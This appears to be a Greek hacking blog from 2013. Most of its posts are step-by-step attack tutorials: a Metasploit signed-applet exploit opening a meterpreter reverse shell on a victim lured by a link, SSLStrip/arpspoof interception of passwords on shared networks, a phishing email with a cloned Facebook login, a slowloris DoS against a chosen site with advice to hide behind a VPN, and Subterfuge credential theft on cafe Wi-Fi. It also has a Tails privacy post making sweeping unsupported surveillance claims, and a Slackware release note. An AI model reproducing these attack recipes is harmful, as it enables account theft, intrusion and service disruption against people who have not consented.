!ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!

ΠΡΟΣΟΧΗ ΠΡΟΣ ΤΟΥΣ ΑΝΑΓΝΩΣΤΕΣ!
**** Σε αυτό το blog μερικά από τα άρθρα είναι αναδημοσιεύσεις από άρθρα του διαδικτύου και άλλα είναι προσωπικά tutorial που αναφέρονται σε διάφορα θέματα. Τα παραπάνω έγιναν για ενημέρωση του κοινού και εμπλουτισμό της εκπαιδευτικής διεύρυνσης. Όλα τα άρθρα είναι για εκπαιδευτικούς και μόνο σκοπούς. Δεν φέρω καμία ευθύνη εάν κάποιος αναγνώστης τα χρησιμοποιήσει κακόβουλα. ****

Πέμπτη 7 Μαρτίου 2013

Java Signed Applet Social Engineering Code Execution - Backtrack 5 R3


Στο tutorial που ακολουθεί θα προσπαθήσω να σας δείξω πως χρησιμοποιούμε τα Social Engineering Tools για να χτυπήσουμε ένα θύμα. Η διαδικασία είναι απλή και όλο το νόημα αυτής βασίζεται στην αποστολή URL στο θύμα μας έτσι ώστε όταν ανοίξει το URL που θα του στείλουμε να εκτεθεί το σύστημα του.

Requirement :
1. Metasploit Framework
2. Operating System(Προτείνω Linux OS ή Backtrack 5)

Βήμα προς Βήμα:
Α) Πρώτα απ' όλα ανοίγουμε ένα τερματικό πληκτρολογούμε:

Terminal: msfconsole <-|


Στη συνέχεια περιμένουμε λίγο και μας εμφανίζει msf> και πληκτρολογούμε:

use exploit/multi/browser/java_signed_applet <-| (φορτίζουμε το java_signed_applet exploit)
set payload windows/meterpreter/reverse_tcp <-| (ορίζουμε το reverse_tcp meterpreter έτσι ώστε να συνδεθούμε με το θύμα)

Β) Το επόμενο βήμα είναι να πληκτρολογήσουμε κάποιες εντολές...

Terminal: set appletname Adobe_Inc <-|
set certcn Adobe Flash Player <-|
set srvhost 192.168.8.92 <-| (η διεύθυνση τουδιακομιστή που ορίζει το exploit δηλαδή η διευθυνσή μας)
set srvport 80 <-| (επιλέγουμε τη θύρα 80 διότι είναι η κατάλληλη για τέτοιου είδους επιθέσεις μέσω social engineering tools)
set uripath videoplaylist <-| (η URL που στέλνουμε στο θύμα μας έτσι ώστε όταν την ανοίξει να εκτεθεί --> http://192.168.8.92/videoplaylist)
set lhost 192.168.8.92 <-| (η διεύθυνση μας)
set lport 443 <-| (η θύρα που χρησιμοποιούμε για να συνδεθούμε με το θύμα μας)
exploit <-| (έναρξη έκθεσης...)

Στη συνέχεια με κάποιο τρόπο πρέπει να αποστείλουμε στο θύμα μας τη διεύθυνση http://192.168.8.92/videoplaylist έτσι ώστε όταν την ανοίξει να αποκτήσουμε πρόσβαση στο σύστημά του. Μπορούμε να την αποστείλουμε με e-mail κτλ.
Όταν λοιπόν την ανοίξει αμέσως στο τερματικό μας τρέχει το σύστημα και μας λέει ότι το meterpreter session 1 opened... και έχει ανοίξει το σύστημα του και μας εμφανίζεται η καρτέλα:

Terminal: session -l <-| (για να δω τα ενεργά session)
Μετά μας βγάζει ότι έχουμε ένα session στη λίστα μας και πληκτρολογώ ξανά..
session -i <-|
Τέλος μας εμφανίζει στην οθόνη meterpreter> που σημαίνει ότι έχουμε μπει πλέον στο σύστημα του.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Τρίτη 5 Μαρτίου 2013

"Ψάρεμα" κωδικών λογαριασμών HTTPS/SSL σελίδων με SSLStrip και ARPSpoof

Γειά σας... Πριν λίγες μέρες έφτιαξα ένα tutorial για το πως ψαρεύουμε κωδικούς πρόσβασης από ένα LAN δίκτυο χρησιμοποιώντας το social engineering tool του Backtrack 5. Σήμερα σε αυτό το tutorial θα σας δείξω πώς να ψαρέψετε κωδικού πρόσβασης από σελίδες με καταλλήξεις https/ssl δηλαδή σελίδες που είναι προστατευμένες με το πρωτόκολλο SSL. Αυτή η τεχνική μπορεί να εφαρμοστεί σε ασύρματα και ενσύρματα δίκτυα. Είναι ουσιαστικά μια ΜΙΤΜ επίθεση και για να πραγματοποιηθεί πρέπει να έχουμε ένα κομβικό σημείο για παράδειγμα ένα router (ασύρματο/ενσύρματο) που να χρησιμοποιήται από πολλούς χρήστες.
Τα εργαλεία που θα χρησιμοποιηθούν είναι το SSLStrip, arpspoof και φυσικά το Backtrack 5 R3.



Αν δεν έχουμε εγκατεστημένο το SSLStrip τότε:

1) Ανοίγω ένα τερματικό και εισάγω: wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

http://zyphyto1.host56.com/sslstrip/3.jpg

2) Στη συνέχεια αποσυμπιέζω το αρχείο που κατέβασα γράφοντας: tar zxvf sslstrip-0.9.tar.gz

http://zyphyto1.host56.com/sslstrip/4.jpg

3) Ανοίγω το φάκελο που αποσυμπίεσα το αρχείο: cd sslstrip-0.9
4) Τέλος κάνω εγκατάσταση γράφοντας: python setup.py install

http://zyphyto1.host56.com/sslstrip/6.jpg

1) Ανοίγω νέο τρματικό και γράφω την παρακάτω εντολή έτσι ώστε να ορίσω τη θύρα που θα στέλνονται τα δεδομένα: echo ’1′ > /proc/sys/net/ipv4/ip_forward 

http://zyphyto1.host56.com/sslstrip/1.jpg

2) Βρισκω την ΙΡ του router: netstat -nr

http://zyphyto1.host56.com/sslstrip/2.jpg

3) Στη συνέχεια ορίζω τα iptables στη θύρα 8080: iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080 

http://zyphyto1.host56.com/sslstrip/7.jpg

4) Αρχίζω να κάνω arpspoofing ή αλλιώς δημιουργώ κίνηση στο router δηλητηριάζοντας το έτσι ώστε να κάνω ΜΙΤΜ επίθεση: arpspoof -i wlan0 192.168.0.1 (Αντικαθιστώ το wlan0 με τον τύπο της σύνδεσης και σαν ΙΡ δίνω την ΙΡ της Gateway που μου δώθηκε όταν έβαλα στο τερματικό την εντολή  netstat -nr

http://zyphyto1.host56.com/sslstrip/8.jpg

5) Τέλος ενεργοποιώ το sslstrip: sslstrip -l 8080

http://zyphyto1.host56.com/sslstrip/9.jpg

6) Επομένως αυτό που έχουμε είναι 2 τερματικά όπου στο ένα τρέχει το sslstrip και στο άλλο το arpspoof

http://zyphyto1.host56.com/sslstrip/12-%20sitandwait.jpg

7) Αν επιθυμώ να μου εμφανίζεται στο τερματικό η κίνηση του δικτύου γράφω: tail -f sslstrip.log 

http://zyphyto1.host56.com/sslstrip/16-logfiletail.jpg

http://zyphyto1.host56.com/sslstrip/17-3screens.jpg

8) Όταν οι χρήστες του δικτύου ανοίξουν οποιαδήποτε σελίδα στην οποία δίνουν username/password τότε αυτομάτως εμφανίζονται στην οθόνη μας. Επίσης αν δεν εμφανίζονται κωδικοί στην οθόνη μπορούμε να μεταβούμε στο φάκελο του sslstrip και να βρούμε ένα αρχείο name.log όπου θα εμφανίζεται εκεί η κίνηση του δικτύου.

http://zyphyto1.host56.com/sslstrip/passwords%20recieved.jpg

ΣΗΜΕΙΩΣΗ:
Για τυχόν errors που θα εμφανιστούν πιθανόν στο τερματικό σας μη δώσετε σημασία. Δεν υπάρχει κανένα πρόβλημα είναι φυσιολογικό. Απλά κάθε φορά έχετε το νού σας για αναβαθμίσεις του sslstrip στη σελίδα του έτσι ώστε να έχετε ενημερωμένες εκδόσεις του.

http://zyphyto1.host56.com/sslstrip/14-error.jpg

Επίσης το sslstrip δεν μπορεί να δουλέψει τόσο καλά με browsers όπως ο Mozilla και το Google Chrome και όπως επίσης με site ειδικά με το Gmail.

Τρόποι προστασίας:
  • Θα πρέπει να αποφεύγουμε να μπαίνουμε σε site όπου δίνουμε κωδικούς πρόσβασης σε δίκτυα ασύρματα/ ενσύρματα που δεν είναι ασφαλή όπως τα ασύρματα δίκτυα μιας καφετέριας ενός internet cafe κτλ.
  • Επίσης θα πρέπει όταν είμαστε σε τέτοια δίκτυα και όταν μπούμε στη σελίδα και πάμε να δώσουμε τον κωδικό πρόσβασης πάντα μα πάντα να ελέγχουμε πάνω στο σύνδεσμο να γράφει: https://............ αυτό είναι η πιστοποίηση για την εγκυρότητα του site. Μας λέει δηλαδή οτι δεν είναι πλαστό και οτι δε χρησιμοποιεί κάποιος μια πλαστή σελίδα έτσι ώστε να μας αποσπάσει κωδικούς.
  • Τέλος, είναι πολύ σημαντικό να προσέχουμε οτιδήποτε περίεργο μας εμφανιστεί ή οποιαδήποτε περίεργη συμπεριφορά προκύψει κατα τη διάρκεια φόρτωσης της οποιαδήποτε σελίδας και του δικτύου.

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Δευτέρα 4 Μαρτίου 2013

Credential Harvester Attack Method (LAN) - Backtrack 5 R3 Tutorial

Σε αυτό το post θα εξηγήσω πως μπορούμε να αποκτήσουμε το Username και το Password του λογαριασμού του στο Facebook.
Για να το πραγματοποιήσουμε θα χρειαστούμε 2 εργαλεία που εμπεριέχονται στο λειτουργικό σύστημα BackTrack 5.
Πρόκειται:
Α) Για το Mass Mailer
Β) Το Harvester Attack Vector

Με το πρώτο στέλνω email στο θύμα μου με το link του κλώνου της εισόδου της σελιδας του Facebook (δημιουργία Fake site). Και αφού κάνω αυτό μετά χρησιμοποιώ το Harvester Attack Vector.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Α) Χρησιμοποίηση του Mass Mailer για αποστολή μυνήματος στο θύμα...

Terminal: 5 ↵ [Mass Mailer Attack]
1 ↵ [E-Mail Attack Single E-mail Address]
Enter who you want to send e-mail to: victim_e-mail@gmail.com
1 ↵ [Enter my_e-mail@hotmail.com]
[Enter my password e-mail]
Enter subject of your email: Reminder ↵
1 ↵ [HTML] or 2 ↵ [Plain] --> Επιλέγω 2 ↵
Next line of the body: This message is an important for your facebook account health. Please update your account so that we present it for hacking attacks. Please follow the link below to update your account.



http://(my ip address)
Regards
^C ↵ (Ctrl + C)

Αυτό που καταφέραμε να κάνουμε με το Mass Mailer είναι να στείλουμε ένα μήνυμα στο θύμα στο οποίο του λέμε να μπεί και να κάνει επιβεβαίωση το λογαριασμό του.

Β) Σε αυτό το στάδιο χρησιμοποιούμε το Credential Harvester Attack.

Terminal: cd pentest/exploits/set ↵
./set ↵

*Αυτό μπορεί να γίνει και από το μενού του backtrack 5 ακολουθόντας τη διαδρομή Bt5 --> explotation tools --> social engineering tools --> set

Στη συνέχεια ακολουθούμε:
Terminal: 2 ↵
3 ↵
1 ↵
4 ↵
Στο σημείο αυτό θα μας βγάλει ''Press {return} to continue'' πατάμε enter και μας βγάζει τρεις σειρές με μπλε γράμματα. Όταν το θύμα ανοίξει το link που του στείλαμε τότε ανοίγει η σελίδα του κλώνου του facebook που δημιουργήσαμε και αυτός όταν πληκτρολογίσει το username – password τότε κοιτάμε στο terminal και μας δείχνει τι πληκτρολόγισε. Έτσι αποκτάμε πρόσβαση στο λογαριασμό του.


ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Τails... Διανομή αποκλειστικά για ανωνυμία και ασφάλεια

Αναφορές στο θέμα Ανωνυμίας και Ασφάλειας δεν θα σταματήσουμε ποτέ να κάνουμε. Όχι τουλάχιστον μεχρι αυτά να γίνουν δεδομένα και δικαίωμα του κάθε χρήστη. Και αυτή τη στιγμή κακά τα ψέματα η ανωνυμία και η ασφάλεια βάλλονται. Οι κυβερνήσεις, αυτοί οι μηχανισμοί βίας, μέσω των υπηρεσιών ασφαλείας κάνουν τα πάντα για να μην έχουν κανένα δικαίωμα στην ανωνυμία οι άνθρωποι.
Θέλεις με δημόσιες κάμερες, οι οποίες στο πρόσχημα της τρομοκρατίας και άλλων τέτοιων χρησιμοποιούνται για άλλους λόγους, θελεις με επιβολή νόμων που επιβάλει την χρήση πιστωτικής κάρτας, με συμβούλια και ελέγχους στην δημοσιογραφία, με δυνάμεις καταστολής και βέβαια με κάθε τρόπο επιβολή αυτών και στο διαδίκτυο.
Βλέπετε το διαδίκτυο είναι το τελευταίο μέρος πλέον όπου καποιος μπορεί ακόμα να μιλήσει ελεύθερα και να ενημερώνει τους ανθρώπους. Και αυτό ενοχλεί τις κυβερνήσεις και το ίδιο το σύστημα, καθώς δείχνει πόσο σάπια και ψεύτικα είναι.
Πρέπει να γίνει κατανοητό στον καθένα πως το δικαίωμα στην ανωνυμία είναι δικαίωμα. Αυτό είναι ανομία και όχι παρανομία, όπως προσπαθούν να πείσουν οι κονδυλοφόροι της “ενημέρωσης” και οι κυβερνητικοί εκπρόσωποι.
Κατανοώ πως ο λεγόμενος καθημερινός χρήστης είναι δύσκολο να ξεχωρίσει κάποια βασικά πράγματα και πως πιστεύει ότι όλα στο διαδίκτυο είναι ρόδινα και ωραία.
Όμως η αλήθεια δεν είναι καθολου έτσι. Οι δυνάμεις καταστολής ψάχνουν και βρίσκουν εξιλαστήρια θύματα, παρουσιάζοντας τα ως τρομοκράτες και ως διασαλευτές της (λεγόμενης) δημόσιας ασφάλειας.
Στο παρελθόν, έχουμε αναφέρει πολλά για το δικαίωμα στην ανωνυμία και την ιδιωτικοτητα. Έχουμε μάλιστα δώσει και ένα… επικό άρθρο με όλα όσα πρέπει να ξέρει και να κάνει καποιος ώστε να έχει αυτά κατά την περιήγηση του στο διαδίκτυο.
Πρέπει πρώτα απ’ όλα να γίνει κατανοητό πως η άρση της ανωνυμίας ξεκινάει από την στιγμή που συνδεόσαστε στο διαδίκτυο και ανοίγετε το λειτουργικό σας σύστημα. Είναι γεγονός πως η Microsoft και τα Windows δεν θέλουν την ανωνυμία και πως όλα μα όλα τα δεδομένα των ανθρώπων που χρησιμοποιούν αυτό το λειτουργικό σύστημα, ταξιδεύουν σε servers της εταιρείας, της CIA/FBI και ανά πάσα στιγμή είναι στη διάθεση οποίας κρατικής υπηρεσίας τα θελήσει.
Ακόμα και οι υποτιθέμενες ιδιωτικές σας συνομιλίες μέσω του Skype καταγράφονται, αποθηκεύονται και ανά πάσα στιγμή μπορούν να χρησιμοποιηθούν εναντίον σας.
Τι και αν δεν είπατε τίποτα κακό, τι και αν έχετε δίκιο, αυτά δεν ενδιαφέρουν καθολου τις δυνάμεις καταστολής. Ακριβώς όπως γίνεται και στην καθημερινότητα. Ρίξτε μια μάτια γύρω σας και δείτε τα υπεροπτικά πρόσωπα των ένστολων που έχουν αυξηθεί ανησυχητικά, οι οποίοι αντιμετωπίζουν τον κάθε άνθρωπο ως εγκληματία, ενώ αυτοί είναι οι… “αθώες περιστερές” και τα πιστά σκυλιά του συστήματος.
Έτσι ακριβώς γίνεται και στο διαδίκτυο και ας μην το μαθαίνετε ποτέ. Οι κυβερνήσεις, μέσω των υπηρεσιών ασφαλείας, θέλουν, απαιτούν τα δεδομένα των ανθρώπων, ώστε να τους… εξηγήσουν τι σημαίνει “δικαιοσύνη”.
Και ας μη πει καποιος ότι ξεφεύγω, επειδή το ίδιο συμβαίνει και στο διαδίκτυο. Υπάρχουν μάτια που παρακολουθούν τα πάντα και εταιρείες (οι λεγόμενοι κολοσσοί) οι οποίοι πρόθυμα και χωρίς δεύτερη κουβέντα δίνουν συνήθως τα δεδομένα και τους ανθρώπους στα νύχια των δυνάμεων καταστολής.
Φυσικά το ίδιο θα κάνει και ο provider σας. Αυτή η εταιρεία δηλαδη η οποία σας παρέχει την πρόσβαση σε ένα κοινωνικό αγαθό όπως το διαδίκτυο, χρεώνοντας σας παράλογα (40 ευρώ τον μήνα ο ΟΤΕ, για παράδειγμα και βέβαια, ακόμα και αν οι κυβερνήσεις “ξεχάσαν”, εμείς δεν ξεχνάμε το βρωμερό παιχνίδι της Vofafone και τις υποκλοπές).
Αν κάποιοι έχετε στραβώσει με τα παραπάνω και τα θεωρείτε υπερβολές, αλλάξτε θέμα η ακόμα καλύτερα αλλάξτε σελίδα. Ένα κλικ μακρυά σας είναι το Facebook και οι εθνικοπατριωτικές σελιδες.
Και έχοντας κάνει ξεκάθαρα κάποια πράγματα, ας περάσουμε και στην ουσία για την ανωνυμία και ιδωτικοτητα στο διαδίκτυο.
Δεν χρειαζεται να έχετε γνώσεις ιδιαίτερες ώστε να επιτύχετε κάτι τέτοιο. Υπάρχουν κάμποσες Linux διανομές που έρχονται έτοιμες για κάτι τέτοιο με τα ανάλογα εργαλεία.

Talis

Μια όμως διανομή του είδους, πιο προσιτή και με όλα τα αναγκαία για ασφάλεια και ανωνυμία είναι το Tails που προέρχεται από τα ακρωνύμια των λέξεων: The Amnesic Incognito Live System.
Η διανομή αυτή δεν απαιτεί καν εγκατάσταση, μα μπορεί να τρέξει live από κάποιο δισκάκι η usb stck.
Παρέχει μια ολοκληρωμένη σειρά ευκολοχρηστων εργαλείων τα οποία προσφέρουν:

Ανώνυμη και ασφαλή περιήγηση στο διαδίκτυο μη αρκούμενη στα όσα κάνει το Tor μα προχωρώντας περισσότερο εις βάθος αρχίζοντας από το ίδιο το σύστημα σας.
Έτσι θα βρείτε εργαλεία για ασφαλή κρυπτογράφηση μα και άμεση καταστροφή των δεδομένων σας σε περίπτωση ανάγκης, ώστε να μην μπορεί να τα ανακτήσει καποιος άλλος.
Αυτό σημαίνει πως πίσω σας δεν αφήνετε ίχνη η πως αυτά είναι πολύ δύσκολο ως σχεδον αδύνατο να ανακτηθούν καθώς απαιτούν μεγάλο κόστος και άπειρο χρόνο.
Η διανομή αυτή, παλιότερα ήταν γνωστή και ως Incognito Linux, βασίζεται στο Debian, είναι μικρή σε μέγεθος και με ένα περιβάλλον προσιτό στον οιονδήποτε.
Το μόνο που έχετε να κάνετε, είναι να την κατεβάσετε (ISO) και να την “κάψετε” σε κάποιο δισκάκι η ακόμα και σε κάποιο usb stick (με το Unetbootin).
Στη συνέχεια εκκινήστε τον υπολογιστή σας από αυτό και έτσι θα μπείτε στο περιβάλλον του Tails, το οποίο σε καμία περίπτωση δεν θα πειράξει η θα έχει κάποια επαφή με το υπάρχον η υπάρχοντα εγκατεστημένα λειτουργικά σας συστήματα.

Το να χρησιμοποιείτε το Tails η όποια άλλη διανομή και εργαλείο ανωνυμίας και να κάνετε login στο Facebook, το Gmail σας και άλλες υπηρεσιες, ΔΕΝ έχει κανένα απολύτως νόημα, καθώς στη πράξη καταργείτε την ανωνυμία σας

Κυριακή 3 Μαρτίου 2013

DoS επίθεση με το BackTrack 5 R3 | Slowloris.pl

Ένα είδος επίθεσης σε κάποιο server είναι η επίθεση DoS (Denial of Service). Για να πραγματοποιήσουμε αυτό υπάρχουν αρκετοί τρόποι (LOIC, HOIC, slowloris κτλ...) Στο παρακάτω απόσπασμα ακολουθεί ένα σεμινάριο DoS επίθεσης με τη χρήση του εργαλείου slowloris στο BackTrack5 R3.
Το πρώτο πράγμα που πρέπει να κάνουμε για πραγματοποιήσουμε αυτό το είδος επίθεσης σε ένα server είναι να βρούμε από το διαδίκτυο το αρχείο slowloris.pl. Το αρχείο αυτό είναι ένας κώδικας και μπορούμε να τον κατεβάσουμε από το link που ακολουθεί:

http://ha.ckers.org/slowloris/slowloris.pl

Αφού ανοίξουμε το link πατάμε επιλογή όλων και δεξί κλικ αντιγραφή. Στη συνέχεια ανοίγουμε ένα κενό έγγραφο κειμένου (gedit), πατάμε επικόλληση και αποθηκεύουμε το έγγραφο στην επιφάνεια εργασίας του BackTrack 5 R3 με το όνομα ''slowloris.pl''.
Αφού κάνουμε αυτό, επόμενο βήμα είναι να βρούμε το στόχο-site που θέλουμε να χτυπήσουμε.
Μετά από αυτό ανοίγουμε ένα terminal και πληκτρολογούμε:

Code:
cd Desktop/ ↵
./slowloris.pl – dns (ip or www.site.com)

Όταν κάνουμε αυτό θα δούμε στην οθόνη να τρέχουν κάποια γράμματα.

Για παράδειγμα
Building Pockets
Building Pockets
Building Pockets
Building Pockets
Building Pockets...
Αυτό σημαίνει ότι η επίθεση έχει αρχίσει...

Τώρα αν προσπαθήσουμε να ανοίξουμε τη σελίδα που χτυπάμε πολύ απλά θα μας δείχνει σφάλμα σύνδεσης στη σελίδα. Όταν σταματήσουμε την επίθεση και ανοίξουμε τη σελίδα τότε θα μπορέσουμε να εισελθουμε σε αυτήν ξανά. Να θυμάστε όσο περισσότερα άτομα χτυπάνε μαζί μια σελίδα τόσο καλύτερο θα είναι το αποτέλεσμα. Μερικοί server όμως που έχουν load balancer πολύ πιθανό η επίθεση DoS να μην πιάσει. Τέλος το slowloris αποτελεί ένα ισχυρό εργαλείο για DoS επιθέσεις όπως επίσης να μη ξεχνάμε πάντα να χρησιμοποιούμε τα κατάλληλα προγράμματα για διαφύλαξη της ανωνυμίας μας. (VPN, proxy, κτλ).

ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Παρασκευή 1 Μαρτίου 2013

Backtrack 5 R3 Tutorial - Αυτοματοποιημένη διαδικασία απόκτησης κωδικών πρόσβασης με Subterfuge


Σε αυτό το tutorial θα δούμε πως να αποκτήσουμε κωδικούς πρόσβασης με διαδικασία ΜΙΤΜ (Man in the Middle) χρησιμοποιώντας το Subterfuge.

1) Πρώτα απ'όλα κατεβάζουμε το subterfuge από εδώ
2) Ανοίγουμε ένα τερματικό και πηγαίνουμε στο φάκελο που κατεβάσαμε το αρχείο μας πληκτρολογόντας cd Downloads και στη συνέχεια ls. Η διαδικασία φαίνεται παρακάτω στην εικόνα.
3) Αποσυμπιέζουμε το αρχείο: tar -zxvf (όνομα αρχείου)


4) Στη συνέχεια γράφουμε: cd subterfuge
5) Μετά γράφουμε την παρακάτω εντολή έτσι ώστε να μας ανοίξει το αρχείο ρυθμίσεων της εφαρμογής και να δούμε ποια είναι η εντολή εγκατάστασης του: nano README




6) Αφού κάναμε έλεγχο πληκτρολογούμε: python setup.py install

7) Για να κάνουμε εγκατάσταση της εφαρμογής σε γραφικό περιβάλλον: ./setup.py



8) Επιλέγουμε πλήρης εγκατάσταση...




9) Για να εκκινήσουμε γράφουμε στο τερματικό: subterfuge


10) Ανοίγουμε τον browser και εισάγουμε το link που φαίνεται http://127.0.0.1:80





11) Στη συνέχεια μας ανοίγει ένα παράθυρο με τις επιλογές της εφαρμογής. Παρατηρούμε ότι υπάρχουν πολλές επιλογές για ένα πλήρες penetration test.



12) Στην πάνω δεξιά γωνία της οθόνης γράφει "Start". Κάνουμε κλίκ και στη συνέχεια επιλέγουμε "ΟΚ" στο μήνυμα που εμφανίζεται





13) Ας ρίξουμε μια ματιά στο τερματικό. Όπως βλέπουμε όλα γίνονται με αυτόματο τρόπο και συγκεκριμένα το arp poisoning, ip forwarding, credential harvester και το sslstrip.


14) Τέλος ρίχνω μια ματιά στον browser και παρατηρώ ότι ανάλογα με την κίνηση του δικτύου και ανάλογα σε ποια σελίδα μπαίνουν για παράδειγμα οι χρήστες του ασύρματου δικτύου σε μια καφετέρια με ασύρματο δωρεάν ιντερνετ παίρνω τους κωδικούς πρόσβασης τους όταν μπαίνουν στους λογαριασμούς τους.



ΠΡΟΣΟΧΗ! Αυτός ο οδηγός εκμάθησης παρέχεται μόνο για εκπαιδευτικούς σκοπούς. Δε φέρω καμιά ευθύνη σε περίπτωση που χρησιμοποιηθεί για κακόβουλη χρήση και για εφαρμογή του σε τρίτους χωρίς την συγκατάθεση τους. Κάθε παράνομη εφαρμογή του οδηγού αυτού διώκεται ποινικά από το νόμο.

Slackware Linux 14.0


Μετά από ανάπτυξη πολλών, σχετικά, μηνών και κυκλοφορίας πέντε (5) release candidates (RC), το Slackware Linux Project κυκλοφόρησε μια ακόμα σταθερή έκδοση της διανομής. Αναφερόμαστε βέβαια στο Slackware Linux 14.0. Ο χρόνος ο οποίος χρειάστηκε για την ανάπτυξη και δοκιμή (testing) αυτής της έκδοσης, είναι δεκαεπτά (17) μήνες και είναι ο μεγαλύτερος έως τώρα, στην δεκαεννιάχρονη (19) πορεία αυτής της ιστορικής διανομής με τις τριαντατρείς (33) σταθερές εκδόσεις.


Συνοπτικά μερικά από τα νέα χαρακτηριστικά αυτής της έκδοσης.

  • Πέρασε πλέον σε πυρήνα Linux (kernel-*) της σειράς 3.x, συγκεκριμένα τον 3.2.29, ο οποίος έχει υποστήριξη μακράς διάρκειας (long-term support) από το kernel.org
  • Η συλλογή GNU compilers (gcc) στην έκδοση 4.7.1
  • Τα εκτελέσιμα μπορούν πλέον να «συνδεθούν» με την GNU C Library (glibc) έκδοσης 2.15
  • Διατίθεται το νέο σύστημα X11R7.7, με τον X.Org Server (xorg-server) 1.12.3
  • Το γραφικό περιβάλλον KDE (kde/*) 4.8.5
  • Το γραφικό περιβάλλον XFCE (xfce/*) 4.10 (στο οποίο ο Thunar μπορεί και από/προσαρτά partitions)
  • Για πρώτη φορά διατίθεται ο γνωστός NetworkManager (NetworkManager) του Gnome Project, για προαιρετική, απλούστερη(!) και «γραφική» ρύθμιση των δικτύων!
  • Ο διάσημος εναλλακτικός compiler Clang/LLVM/(llvm) (default στο FreeBSD 10 dev)
  • Στο extra διατίθεται SlackBuild για δημιουργία πακέτου του Google Chrome
  • Στο testing, υπάρχουν έτοιμα αρχεία config’s για όποιους ενδιαφέρονται (γκουχ-γκουχ) να δοκιμάσουν μια μεταγλώττιση/εγκατάσταση πυρήνων Linux, των εκδόσεων 3.4.11, 3.5.4 και 3.6-rc4
  • Διατίθεται για τις αρχιτεκτονικές x86 (32-bit), x86_64 (64-bit) και ARM
Παρόλα αυτά, ο BDFL της διανομής Patrick J. Volkerding, καθησυχάζει τους χρήστες του λέγοντας πως όποιος έχει χρησιμοποιήσει ξανά την διανομή μπορεί να νοιώθει _ακόμα_ το σύστημά του σαν το σπίτι του..!!

Επίσης, αναφέρει πως στο δικτυακό τόπο SlackBuilds.org, διατίθενται όλων των ειδών build scripts για επιπρόσθετο λογισμικό. Και για όποιον χρειάζεται βοήθεια να επισκεφτεί την νέα ιστοσελίδα τεκμηρίωσης, το Slackware Documentation Project.

Σχετικοί σύνδεσμοι

Επίσημη ιστοσελίδα της διανομής: http://slackware.com/ 

Επίσημη ιστοσελίδα της τεκμηρίωσης: http://docs.slackware.com/

Αποκτήστε τη διανομή: http://slackware.com/getslack/ 

Για την ARM αρχιτεκτονική: http://www.armedslack.org/ 

Επιπρόσθετο λογισμικό: http://slackbuilds.org/

Πηγή: osarena.net